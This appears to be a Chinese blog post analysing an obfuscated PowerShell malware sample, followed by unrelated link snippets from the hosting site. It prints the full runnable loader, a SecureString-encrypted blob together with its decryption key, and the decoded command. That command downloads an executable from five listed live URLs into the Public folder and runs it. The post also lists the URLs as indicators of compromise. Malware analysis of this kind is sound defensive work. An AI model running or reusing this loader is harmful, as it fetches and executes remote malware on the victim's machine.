样本地址

https://www.hybrid-analysis.com/sample/4b4b8b13c264c8f7d7034060e0e4818a573bebc576a94d7b13b4c1741591687f?environmentId=100#

样本使用ConvertTo-SecureString加密字符串。

代码


  2.  powershell "([RUNTiME.iNTeRopsErViCeS.mArShal]::PTRTOstRiNGuNi( [rUnTime.IntErOPSERvIceS.maRsHal]::sECUResTriNGTOgLOBAlAlLOCUNIcoDe($('76492d1116743f0423413b16050a5345MgB8AFgAMgBBAGoAdwB2ADUAdgBzAEMAYwBlADkASwBMAFAAaAB1AEsANwB4AEEAPQA9AHwAYQBkADAAMwA0AGUAOQBiAGMAZABjADUAOABhAGMAYgAzADgANQA4ADMAOQBiAGQAYQAyADEAMwA2ADIAZgA3ADgAMwBlADUAZAAzADkANwBlAGUAMABkADcAZQA1AGEAOQBhADYAMQBlADEAMABlAGIAZABmADkAMQBkADEAYwAwAGQAMgA3ADcANwAyADAAOQA4AGMAYwA3ADYANABmADUANQAxADQAYgA1AGUAYgA3AGIAZQAxADcANgA3ADgAYwA1ADIANwA5ADMAMgBiAGEAZQA2ADEANAA1AGYAYwAyAGUAZgBkAGEAZgAyADgAMABlAGUAZgAzADIANABkADQANgA3AGQAMgBkADcAZgBmADEAZABkAGIAYgA1AGUANwBkAGUANAA1ADEAOAA4ADMANQAxAGUAMQA5AGUANgBhAGUANwA0ADkAMQA4ADMAZgAwADIANwBiADEAZAAwADkANAAxAGEAYwA4AGEAOQBlADAANgA4AGEAYgA2AGMAMgA1AGYANQA5ADQAOQAzADgAYgA1AGIANgA3ADIANwA1ADUANgA4ADEAYgBlADMANgA3AGQAYgBmAGEAZQBlADYAZgAwAGUAMgA5ADcAZQBlADAAZQBmAGYAZQBlADMAYgAzAGUAOAA2ADgAMQBiAGIAMQBlAGMANwA5ADAAYwBjADMAMwAxADUANwA0AGEAYQBkADAAYgA4ADUANwBkADMANwA5ADYAYQBmADgAMgBlADgAZQA4ADUAYwAwAGYAZQBmADIAMQBkADEAZQAxADQAMQA0AGYAYgA3ADUAMQA2ADgAMAAyAGEANAAzAGQAYQBkAGIAMABkADgANAA1ADYANQA3ADQANwBhADAAZQA4ADgAOQBjADQANgAyADkAZQAyAGYAZQA4ADcAOAA0ADgANwA3ADkAMwA4ADcAZQA0ADEAZAAzAGQAZQA0ADcANgA1ADEANwBiAGYAMgAxADYAMQA1ADUAMQAzAGUAYgA4ADAAMgA1ADgAOAAzADgAZQBkAGQAZgBhADIAMAA2ADMANAAwADgAZAAxADIAMwA0AGIAOQBlAGIAZQAyADcAOQA1AGMAMwBiADQAMQBlAGQAMgBjADYAMwA0ADkAOQAyAGMAMwBlADcAYQBhAGUAYQA4AGIAZgAwADMANwAyADMAYQA2ADMAZgA1AGMANQBjADcAMQA1AGEANQA1ADMANgBiAGEAZQBmAGYAMwA5ADQAMwBmADMAZgBjADMAMwBlAGIAYgBjADMAYgA2ADUAYgA2ADIAYQA2AGIAMAA3ADIANQA1AGMAYwA0AGEANAA0AGYAMgAyAGYANwAxAGUAMQBiADEAYgBiADMAMgAxADQAMAAyADcAOAAxADEANQBhAGIANwBhADAAMABhADcAZgA0ADkANwAwADAAOABmAGYAMwA3ADkAMwBlADgAOQA3ADYAYQAxADIAOQAwADMANwAwAGUAOQA0AGIAYwBhAGQAMwA3AGEAOQA0AGEAYwA2ADYAOABkAGYAMABiADMAYgBiAGMAZQA4ADIAMwAxAGQAYwBhAGQAYgA4ADQAMABlADAAYwA3ADkAYgBjADcAYgBjADcAOQA5ADYAYQAzAGYAZgA3ADUAZABkAGEAYQA0ADUAZgA1ADAAOQA1AGUAOAA4ADYAMABjAGIANgA1AGQAYgAwAGMAZgBjADMAZABhADkAOAA1ADYANwBhADQAMwBhADIAYwBhADEAMwA5AGEAMAAzADAANAA3AGIAOQBmAGMAZAA2ADgANwBlAGMAMAAzADAAZAA4ADQAMwAwAGEAZQA5ADQANgBhADcANAAxAGYAMABmADYAOAAwADMAOABlAGUAYQA3ADUANABjADgAMwAwADgANAAzAGYAMQBiADAAOQA4AGQAZABlAGYAZgAwADYANAAyADAANwA4ADMAMgAzAGQAZQAyADMAZQAwADMAMABkAGEAYQA4AGIANQA5ADMAMAAzADkAOQA3ADgANAAwADIANABlADgANAA5ADYAYwA3ADcAMAAwADEAYwAwADYAYgA1AGIANQBiADcAYQA5ADUAOAAxADcAOQA5ADAANwAzADUANgBkADgAZAA3AGQAMwAyAGEAYQBlADYANQBmADgAMgA1ADEAMABjAGQAZgBlADcAYwBmAGEAZQAxAGYAZgBkAGEAZQAwADAAMgA2AGIAZgA0ADEAOAA4ADQAYQBlAGQAZQA5AGMAOQAwADcAMgBkADUAZgA2AGEAMQA3ADEAMQBiAGEAYgBjAGIAZgBhADgAYwAyADcANwBiADMAYQA5ADAAYgA5ADcANgA1ADAAZgA2ADMAMgAwAGQAYgAzAGMAYwA4ADIAZgA2AGQAMQBjADgAMwBmADQAYQAxADYAMgBkADEANgA0ADAAMQBmADIAZgBkADMAYQBlAGIAOQBmAGYAZAAwADQAMwA4AGYANwBhAGMAMgBiADIAZQA1AGMAZQA5AGUAMgBlADUAMQA4ADcAOAA3ADYAYgBiAGEAOAA0ADMAZgAxADcANwA3ADYANABjAGQAYwBlADAAMQAyADQAYwBhAGQANgBiAGIAYQAzADUANgA3ADYAZQBiAGIAYgBiAGUANQBlAGQAYwA2AGMANgBhAGIANgAwAGEANQA5ADUAMQBlADUAMQA0ADQAMQBjADcAZABmADEAMgA3ADEAYwBkADUAZgBkADYAZAA0ADMAOAA1ADUAZQA0AGQAYQA0ADQAZABlAGYANAA0ADMANgA1ADkAMgAwADUAYwBjADMAMgBkADUAYwA2ADcAYQA1ADQAZQA3AGIAZAAyAGEAOQA2ADcANwAwADkANABhAGUANQBkAGUANwAxAGIAZABiADEAYQA2AGMANwAzAGEAZQA5ADEANwA1AGYAYQA1ADYAOAA3AGIAMgBhAGIAZQAyADgAYwA1ADEAZAAzADMAMQBmADEAMQAxADcAOAA4AGYAZAA3ADAANgAyAGUAZgAwADEAYwBmAGQAMQBlADUAMgBjADcANgBkAGEAMgA0ADYAMwAzAGIAMwA5AGMAMQA0ADUAYgA1AGMAZgBiAGYAOAA1AGEANwBkADgAMAAxADAAMwAzAGUAMwAxADIAZgAxAGIANAA3AGIAYwBlADUAMgAwADYAMgA1AGIAYwBlAGMAMwAwAGUANABlADkAMAAyAGYAOAA3ADEANQAxADMAMABhADAAMAA5ADkAYgA1ADQAZQBlAGYANQBjADgAMQBjAGQAMgA2AGQANQA2ADkAZAAyAGEAZgAxADUAYgA5AGYAOABkADQANQBmADAAZQA0ADkAZQA3ADYAYQA2ADAAZAA2ADQAMAA3AGYANwBiADkAMwA2ADkAZgBiADkAYQAxADEAZgA0ADYANAAwAGEAYgBkAGIAYQBjADQAYQBiAGMAYQA4ADIAOAA2AGQAOQBlAGIANQA2AGMAMQA0ADYAZgBiAGQAZABjAGIAYwA2ADIAZAA4ADkAZQBmADYAZgA3AGMAYgAzADcAYgA0ADgANwA5AGIAMwA0AGUAMAAzADQAMgA5ADQAZgAyAGQAZQA3AGQAMQA1ADMAYgBkADIANAA1AGEANgA0AGEANwBlADEAZAAyAGMAZgBhADkAOQBlADUAMgA2ADAAMAA4AGEANgA4ADQAZgA3ADYAOQBlADUAMgBiADYANgA2AGQAYQAwADMANgBkAGMAZQBjAGMAMgBhAGQAMgAwAGQAYgBhAGUANAAwADcANAA4AGYAZAA4AGYANAA0ADkAYQBlADEANwBiAGYAMgBlADMAYgA2ADMAZgA1ADIAYwAxADkANQA5AGYAOQBjAGUAYgA0ADEANQA0AGIANQBhADUANQBjAGUAOQBlADMANABmADEAYwAyADEANQAxADQANQA4ADgAOAAyADkANAA3AGUANwBhADQAMgA5ADAANQBhAGIANQAwADIAZgAxAGYAZABlAGYAYgA4ADcAYwAyADMAYwA1AGUAYQA4AGIANABkAGMANwBlADIAMwA2AGMAMwBmAGQAYwAzAGEAZgA5AGQAYQAwADMAOQAxAGQAMQBiADgAZAA2ADYAZAA3AGMAMABiADAAMgA1ADYAOABiADYAZQAzADcAMAAzAGUAZAA5ADkAYQA3ADQAZgBjADMANABiAGMAMQA0ADcANABiADMAYgBjADQAMwAxAGYANwBiAGUANgA5ADEANwAxADAANAAwAGEAMgAwADEAOQA1AGMANABkADAAMAAwAGEAMQA3AGUANwBjADgANwAzADcAZAA1ADAAMgBjAGIAOQBjADEAZQBkADYAYgBmAGEAMgBlAGYANABiADIAMgA1ADMAMQBhADAAYQBkADcAMAAxADcAMgA1ADgAOQA1ADAAZAA0AGEANQAxAGYAMQAwADIAMAA3AGMAZgA1AGYAMgA1AGYAYQAxAGYAZgA3ADEAMQBjADEAMwAzADkAZQBhADEAYgA4ADUANgA1ADAAMAAzAGEAMQBiADEAYgA0ADUAYQAzAGIAMgA2ADEANwA4ADgAOQA4ADMANwA4ADUAMwA4AGYAMAAwADMAZABkAGEAZAA5ADcAZQBiADYANAAzADkAOQA2ADIAYQBmADYAOQBjAGIAZQA5AGYANQA1ADMAZAA5AGMANwBmAGMAZQBiAGIANQAwADAAMABlADYAOQBmADkANwA3ADQAZABjADgAMABjADcAZAA2ADcAZAA4ADEAYgA1AGIANgBkADYAYgBiADAAZgA1ADQAMgBmADEAMgA2AGMAYQBjADQAYwBlAGYANgA0AGUAMAA3AGEAMAAyAGEAOAA2ADYAMwA0ADkANQBmADkAYgBlAGEAYwBjADgAMgA5ADIAZgAxADYAZgA1ADYAOQBkAGQAMAA2AGMANwA4AGYANQA2AGQAMgAyADEAYgA3ADkAMgA1AGUAZQAyAGUANABkADEAMgBkAGUANgBlAGQANAA4AGIANQA1ADQANwA5ADQAZQBhAGIANAAxAGEANgBmADYAZgBmADgAYQAzADIAMwAzAGYAYQA5ADkANwA2ADIANwA5ADEAMwA0AGQAYwBmAGMAOQAyADIANABkADUAYwA1AGQANAAyAGEANwBlADAANAA5ADUANwA1ADMAZgAwAGYAZgBjAGMAOQA3ADcAMAA4AGIAMwA1ADQAMgA3AGMAZAA1ADQANAAzADAANwAwAGIAMgAwADQAYgA4AGYAMQA4ADAAZgAyAGYAZABkADEANwBhADAANwBjADYANwAxADAANgA='| cOnVertTO-SEcUrEStrinG -KE 196,148,187,123,187,195,213,254,9,250,232,193,112,146,83,172,255,41,240,23,34,95,215,17,226,111,128,53,126,193,106,149)) ))| .( $Env:cOMSpeC[4,24,25]-JOIn'')

  2. PS C:\Windows\system32> ([RUNTiME.iNTeRopsErViCeS.mArShal]::PTRTOstRiNGuNi( [rUnTime.IntErOPSERvIceS.maRsHal]::sECUResTr
  3. iNGTOgLOBAlAlLOCUNIcoDe($('76492d1116743f0423413b16050a5345MgB8AFgAMgBBAGoAdwB2ADUAdgBzAEMAYwBlADkASwBMAFAAaAB1AEsANwB4A
  4. EEAPQA9AHwAYQBkADAAMwA0AGUAOQBiAGMAZABjADUAOABhAGMAYgAzADgANQA4ADMAOQBiAGQAYQAyADEAMwA2ADIAZgA3ADgAMwBlADUAZAAzADkANwBlA
  5. GUAMABkADcAZQA1AGEAOQBhADYAMQBlADEAMABlAGIAZABmADkAMQBkADEAYwAwAGQAMgA3ADcANwAyADAAOQA4AGMAYwA3ADYANABmADUANQAxADQAYgA1A
  6. GUAYgA3AGIAZQAxADcANgA3ADgAYwA1ADIANwA5ADMAMgBiAGEAZQA2ADEANAA1AGYAYwAyAGUAZgBkAGEAZgAyADgAMABlAGUAZgAzADIANABkADQANgA3A
  7. GQAMgBkADcAZgBmADEAZABkAGIAYgA1AGUANwBkAGUANAA1ADEAOAA4ADMANQAxAGUAMQA5AGUANgBhAGUANwA0ADkAMQA4ADMAZgAwADIANwBiADEAZAAwA
  8. DkANAAxAGEAYwA4AGEAOQBlADAANgA4AGEAYgA2AGMAMgA1AGYANQA5ADQAOQAzADgAYgA1AGIANgA3ADIANwA1ADUANgA4ADEAYgBlADMANgA3AGQAYgBmA
  9. GEAZQBlADYAZgAwAGUAMgA5ADcAZQBlADAAZQBmAGYAZQBlADMAYgAzAGUAOAA2ADgAMQBiAGIAMQBlAGMANwA5ADAAYwBjADMAMwAxADUANwA0AGEAYQBkA
  10. DAAYgA4ADUANwBkADMANwA5ADYAYQBmADgAMgBlADgAZQA4ADUAYwAwAGYAZQBmADIAMQBkADEAZQAxADQAMQA0AGYAYgA3ADUAMQA2ADgAMAAyAGEANAAzA
  11. GQAYQBkAGIAMABkADgANAA1ADYANQA3ADQANwBhADAAZQA4ADgAOQBjADQANgAyADkAZQAyAGYAZQA4ADcAOAA0ADgANwA3ADkAMwA4ADcAZQA0ADEAZAAzA
  12. GQAZQA0ADcANgA1ADEANwBiAGYAMgAxADYAMQA1ADUAMQAzAGUAYgA4ADAAMgA1ADgAOAAzADgAZQBkAGQAZgBhADIAMAA2ADMANAAwADgAZAAxADIAMwA0A
  13. GIAOQBlAGIAZQAyADcAOQA1AGMAMwBiADQAMQBlAGQAMgBjADYAMwA0ADkAOQAyAGMAMwBlADcAYQBhAGUAYQA4AGIAZgAwADMANwAyADMAYQA2ADMAZgA1A
  14. GMANQBjADcAMQA1AGEANQA1ADMANgBiAGEAZQBmAGYAMwA5ADQAMwBmADMAZgBjADMAMwBlAGIAYgBjADMAYgA2ADUAYgA2ADIAYQA2AGIAMAA3ADIANQA1A
  15. GMAYwA0AGEANAA0AGYAMgAyAGYANwAxAGUAMQBiADEAYgBiADMAMgAxADQAMAAyADcAOAAxADEANQBhAGIANwBhADAAMABhADcAZgA0ADkANwAwADAAOABmA
  16. GYAMwA3ADkAMwBlADgAOQA3ADYAYQAxADIAOQAwADMANwAwAGUAOQA0AGIAYwBhAGQAMwA3AGEAOQA0AGEAYwA2ADYAOABkAGYAMABiADMAYgBiAGMAZQA4A
  17. DIAMwAxAGQAYwBhAGQAYgA4ADQAMABlADAAYwA3ADkAYgBjADcAYgBjADcAOQA5ADYAYQAzAGYAZgA3ADUAZABkAGEAYQA0ADUAZgA1ADAAOQA1AGUAOAA4A
  18. DYAMABjAGIANgA1AGQAYgAwAGMAZgBjADMAZABhADkAOAA1ADYANwBhADQAMwBhADIAYwBhADEAMwA5AGEAMAAzADAANAA3AGIAOQBmAGMAZAA2ADgANwBlA
  19. GMAMAAzADAAZAA4ADQAMwAwAGEAZQA5ADQANgBhADcANAAxAGYAMABmADYAOAAwADMAOABlAGUAYQA3ADUANABjADgAMwAwADgANAAzAGYAMQBiADAAOQA4A
  20. GQAZABlAGYAZgAwADYANAAyADAANwA4ADMAMgAzAGQAZQAyADMAZQAwADMAMABkAGEAYQA4AGIANQA5ADMAMAAzADkAOQA3ADgANAAwADIANABlADgANAA5A
  21. DYAYwA3ADcAMAAwADEAYwAwADYAYgA1AGIANQBiADcAYQA5ADUAOAAxADcAOQA5ADAANwAzADUANgBkADgAZAA3AGQAMwAyAGEAYQBlADYANQBmADgAMgA1A
  22. DEAMABjAGQAZgBlADcAYwBmAGEAZQAxAGYAZgBkAGEAZQAwADAAMgA2AGIAZgA0ADEAOAA4ADQAYQBlAGQAZQA5AGMAOQAwADcAMgBkADUAZgA2AGEAMQA3A
  23. DEAMQBiAGEAYgBjAGIAZgBhADgAYwAyADcANwBiADMAYQA5ADAAYgA5ADcANgA1ADAAZgA2ADMAMgAwAGQAYgAzAGMAYwA4ADIAZgA2AGQAMQBjADgAMwBmA
  24. DQAYQAxADYAMgBkADEANgA0ADAAMQBmADIAZgBkADMAYQBlAGIAOQBmAGYAZAAwADQAMwA4AGYANwBhAGMAMgBiADIAZQA1AGMAZQA5AGUAMgBlADUAMQA4A
  25. DcAOAA3ADYAYgBiAGEAOAA0ADMAZgAxADcANwA3ADYANABjAGQAYwBlADAAMQAyADQAYwBhAGQANgBiAGIAYQAzADUANgA3ADYAZQBiAGIAYgBiAGUANQBlA
  26. GQAYwA2AGMANgBhAGIANgAwAGEANQA5ADUAMQBlADUAMQA0ADQAMQBjADcAZABmADEAMgA3ADEAYwBkADUAZgBkADYAZAA0ADMAOAA1ADUAZQA0AGQAYQA0A
  27. DQAZABlAGYANAA0ADMANgA1ADkAMgAwADUAYwBjADMAMgBkADUAYwA2ADcAYQA1ADQAZQA3AGIAZAAyAGEAOQA2ADcANwAwADkANABhAGUANQBkAGUANwAxA
  28. GIAZABiADEAYQA2AGMANwAzAGEAZQA5ADEANwA1AGYAYQA1ADYAOAA3AGIAMgBhAGIAZQAyADgAYwA1ADEAZAAzADMAMQBmADEAMQAxADcAOAA4AGYAZAA3A
  29. DAANgAyAGUAZgAwADEAYwBmAGQAMQBlADUAMgBjADcANgBkAGEAMgA0ADYAMwAzAGIAMwA5AGMAMQA0ADUAYgA1AGMAZgBiAGYAOAA1AGEANwBkADgAMAAxA
  30. DAAMwAzAGUAMwAxADIAZgAxAGIANAA3AGIAYwBlADUAMgAwADYAMgA1AGIAYwBlAGMAMwAwAGUANABlADkAMAAyAGYAOAA3ADEANQAxADMAMABhADAAMAA5A
  31. DkAYgA1ADQAZQBlAGYANQBjADgAMQBjAGQAMgA2AGQANQA2ADkAZAAyAGEAZgAxADUAYgA5AGYAOABkADQANQBmADAAZQA0ADkAZQA3ADYAYQA2ADAAZAA2A
  32. DQAMAA3AGYANwBiADkAMwA2ADkAZgBiADkAYQAxADEAZgA0ADYANAAwAGEAYgBkAGIAYQBjADQAYQBiAGMAYQA4ADIAOAA2AGQAOQBlAGIANQA2AGMAMQA0A
  33. DYAZgBiAGQAZABjAGIAYwA2ADIAZAA4ADkAZQBmADYAZgA3AGMAYgAzADcAYgA0ADgANwA5AGIAMwA0AGUAMAAzADQAMgA5ADQAZgAyAGQAZQA3AGQAMQA1A
  34. DMAYgBkADIANAA1AGEANgA0AGEANwBlADEAZAAyAGMAZgBhADkAOQBlADUAMgA2ADAAMAA4AGEANgA4ADQAZgA3ADYAOQBlADUAMgBiADYANgA2AGQAYQAwA
  35. DMANgBkAGMAZQBjAGMAMgBhAGQAMgAwAGQAYgBhAGUANAAwADcANAA4AGYAZAA4AGYANAA0ADkAYQBlADEANwBiAGYAMgBlADMAYgA2ADMAZgA1ADIAYwAxA
  36. DkANQA5AGYAOQBjAGUAYgA0ADEANQA0AGIANQBhADUANQBjAGUAOQBlADMANABmADEAYwAyADEANQAxADQANQA4ADgAOAAyADkANAA3AGUANwBhADQAMgA5A
  37. DAANQBhAGIANQAwADIAZgAxAGYAZABlAGYAYgA4ADcAYwAyADMAYwA1AGUAYQA4AGIANABkAGMANwBlADIAMwA2AGMAMwBmAGQAYwAzAGEAZgA5AGQAYQAwA
  38. DMAOQAxAGQAMQBiADgAZAA2ADYAZAA3AGMAMABiADAAMgA1ADYAOABiADYAZQAzADcAMAAzAGUAZAA5ADkAYQA3ADQAZgBjADMANABiAGMAMQA0ADcANABiA
  39. DMAYgBjADQAMwAxAGYANwBiAGUANgA5ADEANwAxADAANAAwAGEAMgAwADEAOQA1AGMANABkADAAMAAwAGEAMQA3AGUANwBjADgANwAzADcAZAA1ADAAMgBjA
  40. GIAOQBjADEAZQBkADYAYgBmAGEAMgBlAGYANABiADIAMgA1ADMAMQBhADAAYQBkADcAMAAxADcAMgA1ADgAOQA1ADAAZAA0AGEANQAxAGYAMQAwADIAMAA3A
  41. GMAZgA1AGYAMgA1AGYAYQAxAGYAZgA3ADEAMQBjADEAMwAzADkAZQBhADEAYgA4ADUANgA1ADAAMAAzAGEAMQBiADEAYgA0ADUAYQAzAGIAMgA2ADEANwA4A
  42. DgAOQA4ADMANwA4ADUAMwA4AGYAMAAwADMAZABkAGEAZAA5ADcAZQBiADYANAAzADkAOQA2ADIAYQBmADYAOQBjAGIAZQA5AGYANQA1ADMAZAA5AGMANwBmA
  43. GMAZQBiAGIANQAwADAAMABlADYAOQBmADkANwA3ADQAZABjADgAMABjADcAZAA2ADcAZAA4ADEAYgA1AGIANgBkADYAYgBiADAAZgA1ADQAMgBmADEAMgA2A
  44. GMAYQBjADQAYwBlAGYANgA0AGUAMAA3AGEAMAAyAGEAOAA2ADYAMwA0ADkANQBmADkAYgBlAGEAYwBjADgAMgA5ADIAZgAxADYAZgA1ADYAOQBkAGQAMAA2A
  45. GMANwA4AGYANQA2AGQAMgAyADEAYgA3ADkAMgA1AGUAZQAyAGUANABkADEAMgBkAGUANgBlAGQANAA4AGIANQA1ADQANwA5ADQAZQBhAGIANAAxAGEANgBmA
  46. DYAZgBmADgAYQAzADIAMwAzAGYAYQA5ADkANwA2ADIANwA5ADEAMwA0AGQAYwBmAGMAOQAyADIANABkADUAYwA1AGQANAAyAGEANwBlADAANAA5ADUANwA1A
  47. DMAZgAwAGYAZgBjAGMAOQA3ADcAMAA4AGIAMwA1ADQAMgA3AGMAZAA1ADQANAAzADAANwAwAGIAMgAwADQAYgA4AGYAMQA4ADAAZgAyAGYAZABkADEANwBhA
  48. DAANwBjADYANwAxADAANgA='| cOnVertTO-SEcUrEStrinG -KE 196,148,187,123,187,195,213,254,9,250,232,193,112,146,83,172,255,41
  49. ,240,23,34,95,215,17,226,111,128,53,126,193,106,149)) ))
  50. $nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000
  51. , 282133);$ADCX = '
  52. http://quote.freakget.com/wp-content/rCk5/@http://www.lightchasers.in/Mwmg/@http://casastoneworks.com.au/9ARR4/@http://
  53. jasclair.com/scI8YTL/@http://convivialevent.fr/IoVWm/'.Split('@');$SDC = $env:public + '\' + $NSB + ('.ex'+'e');foreach
  54. ($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item')($SDC);break;}catch{}}
  55. PS C:\Windows\system32>

Network IoCs:

  1. http://quote.freakget.com/wp-content/rCk5/
  2. http://www.lightchasers.in/Mwmg/
  3. http://casastoneworks.com.au/9ARR4/@http://
  4. http://jasclair.com/scI8YTL/
  5. http://convivialevent.fr/IoVWm/

记一次powershell反混淆(2)的更多相关文章

  1. 记一次Powershell反混淆 (1)

    样本地址: https://www.virustotal.com/#/file/6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1c ...

  2. .net破解一(反编译,反混淆-剥壳)

    大家好,前段时间做数据分析,需要解析对方数据,而数据文件是对方公司内部的生成方式,完全不知道它是怎么生成的. 不过还好能拿到客户端(正好是C#开发)所以第一件事就是用Reflector编译,但是没有想 ...

  3. C# 反编译-Reflector 反混淆-De4Dot 修改dll/exe代码-reflexil

    反编译工具 Reflector 破解版下载地址:http://pan.baidu.com/s/15UwJo 使用方法:略 反混淆工具De4Dot 开源软件 下载地址http://pan.baidu.c ...

  4. js混淆 反混淆 在线

    js反混淆地址:http://www.bm8.com.cn/jsConfusion/ 在线javascript 混淆http://www.moralsoft.com/jso-online/hdojso ...

  5. net破解一(反编译,反混淆-剥壳,工具推荐)

    net破解一(反编译,反混淆-剥壳,工具推荐) 大家好,前段时间做数据分析,需要解析对方数据,而数据文件是对方公司内部的生成方式,完全不知道它是怎么生成的. 不过还好能拿到客户端(正好是C#开发)所以 ...

  6. RESTClient调试POST方法&Reflector+de4dot反混淆破解dll

    RESTClient调试POST方法 RESTClient是火狐的一款WebAPI测试工具. 1.先看下我们要调试的接口

  7. .net反混淆脱壳工具de4dot的使用

    de4dot是一个开源的.net反混淆脱壳工具,是用C#编写的,介绍一下它的使用方法 首先 pushd 到de4dot.exe所在文件夹,然后调用 de4dot.exe  路径+dll名称 如果显示: ...

  8. 通过C#调用,实现js加密代码的反混淆,并运行js函数

    前一篇我测试了vba调用htmlfile做反混淆,并执行js加密函数的代码.本文换成C#实现. 联系QQ:564955427 C#操作JS函数,可以通过ScriptControl组件,但这个组件只能在 ...

  9. 使用VBA进行JS加密的反混淆,还原JS代码。

    本文地址:http://www.cnblogs.com/Charltsing/p/JSEval.html 联系QQ:564955427 类似下面的代码是登陆 全国企业信用信息公示系统(安徽)(网址:h ...

随机推荐

  1. PHP中关于取模运算及符号

    执行程序段<?php  echo 8%(-2) ?>,输出结果是: %为取模运算,以上程序将输出0 $a%$b,其结果的正负取决于$a的符号. echo ((-8)%3);     //将 ...

  2. SpringMVC源码剖析(五)-消息转换器HttpMessageConverter

    原文链接:https://my.oschina.net/lichhao/blog/172562 #概述 在SpringMVC中,可以使用@RequestBody和@ResponseBody两个注解,分 ...

  3. Spring-MVC理解之二:前置控制器

    原文链接:http://www.cnblogs.com/brolanda/p/4265749.html 一.前置控制器配置与讲解 上篇中理解了IOC容器的初始化时机,并理解了webApplicatio ...

  4. tarjan求lca 模板

    #include <iostream> #include <cstdio> #include <sstream> #include <cstring> ...

  5. web框架引入

    1. web请求的本质就是一个socket. 2.http:一次请求,一次响应,断开链接.如下程序:必须先运行服务器端,然后客户端才能去连接.所有web框架的本质就是如下: import socket ...

  6. Insert Node in Sorted Linked List

    Insert a node in a sorted linked list. Have you met this question in a real interview?  Yes Example ...

  7. 洛谷 P2258 子矩阵

    题目描述 给出如下定义: 子矩阵:从一个矩阵当中选取某些行和某些列交叉位置所组成的新矩阵(保持行与列的相对顺序)被称为原矩阵的一个子矩阵. 例如,下面左图中选取第2.4行和第2.4.5列交叉位置的元素 ...

  8. 解题:USACO06DEC Milk Patterns

    题面 初见SA 用了一个常见的按$height$分组的操作:二分答案,然后按$height$分组,遇到一个$height$小于$mid$的就丢进下一组并更新答案,如果最多的那组不少于$k$个说明可行 ...

  9. opencv查找轮廓---cvFindContours && cvDrawCountours 用法及例子

    http://blog.csdn.net/timidsmile/article/details/8519751 环境: vs2008 + opencv2.1 先看,这两个函数的用法(参考 opencv ...

  10. 洛谷P1199 三国游戏

    题目描述 小涵很喜欢电脑游戏,这些天他正在玩一个叫做<三国>的游戏. 在游戏中,小涵和计算机各执一方,组建各自的军队进行对战.游戏中共有 N 位武将(N为偶数且不小于 4),任意两个武将之 ...